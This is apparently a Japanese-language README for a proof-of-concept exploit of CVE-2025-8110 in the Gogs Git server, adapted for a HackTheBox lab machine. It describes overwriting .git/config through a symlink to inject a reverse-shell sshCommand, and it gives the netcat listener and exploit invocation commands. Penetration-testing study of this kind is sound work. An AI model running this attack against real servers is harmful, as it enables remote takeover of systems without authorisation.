
CVE-2025-8110は、HTBのSilentiumボックス専用です。
免責事項: このツールは教育目的および許可されたペネトレーションテストにのみ使用することを目的としています。明示的な許可を得たシステムに対してのみ使用してください。
これは zAbuQasem/gogs-CVE-2025-8110 の修正版で、HackTheBox の Silentium マシンに適合するように変更されています。元の PoC は Silentium の特定の Gogs 設定と認証フローに対応するために調整が必要でした。
CVE-2025-8110 は、セルフホスト型 Git サービス Gogs におけるリモートコード実行の脆弱性です。
Gogs のファイル更新 API エンドポイント(PUT /api/v1/repos/.../contents/<file>)は、対象ファイルがシンボリックリンクかどうかを検証しません。認証済みの攻撃者はリポジトリに .git/config を指すシンボリックリンクをプッシュし、API を使用して悪意のあるペイロードで上書きできます。ペイロードは git 設定にカスタム sshCommand を注入し、Gogs がそのリポジトリで次に SSH 操作を実行する際にサーバー側で実行され、リモートコード実行に至ります。
malicious_link -> .git/config)を仕込んでプッシュします。sshCommand = <リバースシェル> を含む悪意のある .git/config を書き込みます。.git/config を上書きし、次の SSH 操作でシェルを起動します。依存関係のインストール:
pip install -r requirements.txt
リスナーを起動:
nc -lvnp <PORT>
エクスプロイトを実行:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>
オプション — Burp Suite 経由でルーティング:
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
| フラグ | 説明 |
|---|---|
-u | Gogs のベース URL |
-lh | 攻撃者の IP(リバースシェルホスト) |
-lp | リスナーポート |
-un | 登録済みの Gogs ユーザー名 |
-pw | Gogs パスワード |
-x | (オプション)Burp(localhost:8080)経由でトラフィックをルーティング |